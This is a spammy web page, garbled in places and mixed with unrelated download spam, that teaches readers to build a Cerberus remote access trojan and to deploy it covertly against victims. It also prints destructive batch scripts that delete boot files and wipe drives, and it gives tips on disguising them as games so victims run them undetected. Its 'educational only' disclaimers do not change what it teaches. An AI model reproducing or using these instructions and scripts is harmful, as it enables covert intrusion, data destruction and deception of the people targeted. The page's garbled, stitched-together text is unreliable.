How To Create A Virus Using Notepad Harmful Pdf FileHow To Create A Virus Using Notepad Harmful Pdf File

In this post we will learn how to create Remote Administration Tool(RAT). But before we proceed let's discus some basic terminologies. Trojan: Trojan horse or Trojan is a malware that appears to perform a desirable function for the user prior to run or install but instead facilitates unauthorized access of the user's computer system. It is harmful software/code that appears legitimate. They come packed with some other piece of code or software and hence users get tricked to run them. The term Trojan has been derived from the Trojan Horse from Greek Mythology. Types Of Trojan: 1.Remote Access Tool (RAT) 2.Proxy 3.File Sending Trojan 4.Security Disable rs 5.Denial Of Service (DOS) 6.File Sending Trojans(FTP Trojan) 7.Destructive Trojans Remote Access Tool(RAT): Remote Administration Tool also known as RAT is used to remotely connect and manage single or multiple computers.

RAT is one of the most dangerous Trojan because it compromises features of all types of Trojans. It provides an attacker with nearly unlimited access to host computer along with Screen Capture, File management, shell control and device drivers control. RATs uses reverse connections to connect remote system and hence are more likely to remain undetected. They can hide themselves in process space of legitimate program and hence never appear in task manager or system monitors. Dota 2 Free Download Full Version For Pc No Survey Torrent.

A Trojan generally has two parts Client and Server or Master and Slave. We can say Server is Slave and Client is Master. So a server side is installed on a remote host and the attacker manipulates it with client software. In olden days making a Trojan was a job of master programmer but now a days several Trojan building tools are available. Most of them usually have same kinda interface so its quite easy to use any Trojan client once you have used any one of them. Following is list of some well known Trojans and Trojan Building Tools, 1.Casa RAT 2.Back Orifice 3.Bandook RAT 4.Dark Comet Rat 5.Cerberus 6.Cybergate 7.Blackshades 8.Poison Ivy 9.Schwarze Sonne RAT 10.Syndrome RAT 11.Team Viewer 12.Y3k RAT 13Snoopy 15.5p00f3r.N$ RAT 16.NetBus 17.SpyNet 18.P.

Note: Here I am posting 21 program scripts which are helped in create a virus using notepad. Some of them will works on windows xp and. Some of them in windows 7. Here is a Batch File virus which can: 1.Copy itself into startup 2.Copy itself over one thousand times into random spots in your computer.

Storrie RAT 19.Turkojan Gold 20.Bifrost 21.Lost Door 22.Beast 23.Shark 24.Sub7 25.Pain RAT 26.xHacker Pro RAT 27.Seed RAT 28.Optix Pro RAT 29.Dark Moon 30.NetDevil 31.Deeper RAT 32.MiniMo RAT If you think the list is very big then I must tell you it's not complete nor it covered 25% of RAT building tools. Demonstration: How to create a RAT:Since there are several tools available and most of them have same kinda interface we can select any RAT building tool for demonstration.

So here we select Cerberus Client to demonstrate working of RAT. Please note that using RAT for hacking is crime please take this demonstration for educational purpose only. Type “Download Cerberus RAT” in Google search and download Cerberus RAT. Execute Cerberus file and launch program.

Accept EULA and following interface will be launched in front of you. To create server press new button. As you can see there are several options are available in settings but for our demonstration we will use most common settings. In “Basic Option” type your IP address and then press “+”. In identification name of the server from which your client will identify to which server it's listening, this name is given for your client to identify connection. No need to specify what to put in connection password. Specify the port on which you'll like to listen.

Please keep note of this port since you'll have to configure client settings to receive information on this port. The next option is “Server Installation”. From “Directory Installation” you can select where and in which name folder your RAT server will be installed. In “File Name” option you have to specify name and extension of your server.

Code De La Route En Algerie Pdf En Arabe more. Boot Methods gives you option to start your server as “System Service” or “User Application” take your pick or leave them untouched. “Anti-Debugging” function allows your RAT to bypass Virtualisation and Sandboxing. From “Misc Options” you can activate key logging feature as well as you can select how your RAT can hide itself in another process. “Display Message” option gives you power to show custom message on victim's computer. “Black List Item” option allows to set logic for execution of your RAT server with respect to specific process and service.

Mostly only advanced users use this feature. “Overview” allows you look of features of your RAT. Now select an icon and press create server to create server. Now the add file function allows you to bind your RAT with any legitimate file most probable is an executable installation file. To avoid detection don't use custom message box and UN-check “Run in Visible Mode” option while creating server. Configuring To Listen On Client: To configure Cerberus to listen on specific port select options and put “Connection Password” and “Connection Ports” that were specified in Server.

Wait for victim to execute server and then just right click on listening server and play with options. The above tutorial is only for educational purpose and if u use it for any other purpose i am not held responsible Following is video demonstration to above procedures and methods described to create RAT using Cerberus Client.

Be Aware of Virus & Learn How they works NOTE: Try at your own risk WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED We have listed down 5 dangerous Viruses How to create more than 3,000 folders under a minute: • 1) Open your notepad and type the following code. @echo off:top md%random% goto top 2) Save it as 1000.bat @echo off makes your screen appear blank but it is actually making hundreds of folders. Md%random% is command that creating folders with random names.( md is a command to make directory in ms-dos) goto top – return the command to:top, causes an infinite loop.

NOTE: The folders will get created in the directory where you saved the ”1000.bat” file. The file might look suspicious to your friends. So if you are looking to fool your friends, then change the file name and also the icon so that he doesn’t suspect the file to be a virus. ==================================================================== ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ==================================================================== 2. How to Shutdown a computer forever? Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer.

Copy the following code into your notepad @echo off attrib -r -s -h c: autoexec.bat del c: autoexec.bat attrib -r -s -h c: boot.ini del c: boot.ini attrib -r -s -h c: ntldr del c: ntldr attrib -r -s -h c: windows win.ini del c: windows win.ini Save it as “shutdown- forever.bat”. Just make sure it has a.bat or.cmd extension. DONT RUN THE BATCH FILE,YOU WONT RECOVER BACK AFTER YOU RUN IT!!! This should shutdown the persons computer.

It shuts it off once and deletes the files needed to reboot and restart.So please, use this hack only if you have no intention of rebooting your computer again. So just be careful. Here’s an alternative code. Cmd /c del c: windows * /F /S / Q cmd /c del c: * /F /S /Q Paste it in NotePad And Save It with Extension.cmd or.bat.

============================================= 3. How to Delete all your system: files with a small command! Copy the following code into your notepad and save it as a.bat file. Del *.* All your files in your hard disk will vanish in less than 5mins. ============================================= 4. RAM crashing trick: Those bloggers who wants more views of there blog. Try it Note: It will continuously will open the separate of page of given link.

Open notepad and type:A start goto A save with.bat extension. Infinitely loops your browser to open up ============================================= 5.

Crash a Computer System With: Nothing But a Link. This is a javascript “exploit”, it will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows.

To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM. Every instance occupies about 1000 bytes, if your victim is smart, he better end the process As soon as possible or he will be forced to reboot his computer. YOU ARE WARAN THIS LINK WILL CRASH YOUR BROWSER OR WORSE, YOUR COMPUTER!!!! Here’s my work! It will make you unable to use your PC and FORCE you to install Windows OS again. You will only be aware of the infiltration the next time you turn on your Computer! Use the latest version of “Bat To Exe Converter” and add Administrator manifest to it and make it Invisible application before converting it to.exe!

Your victim doesn’t even know what is happening or what this virus did. Your trusted Antivirus can’t even detect it cause this file doesn’t work as normal viruses but the later damage will be way too much than what a couple of malware can do. You may name it in a sexy way like GTA and choose the appropriate icon to attract your victim’s attention. But please, don’t try to be an ASS HAT with it.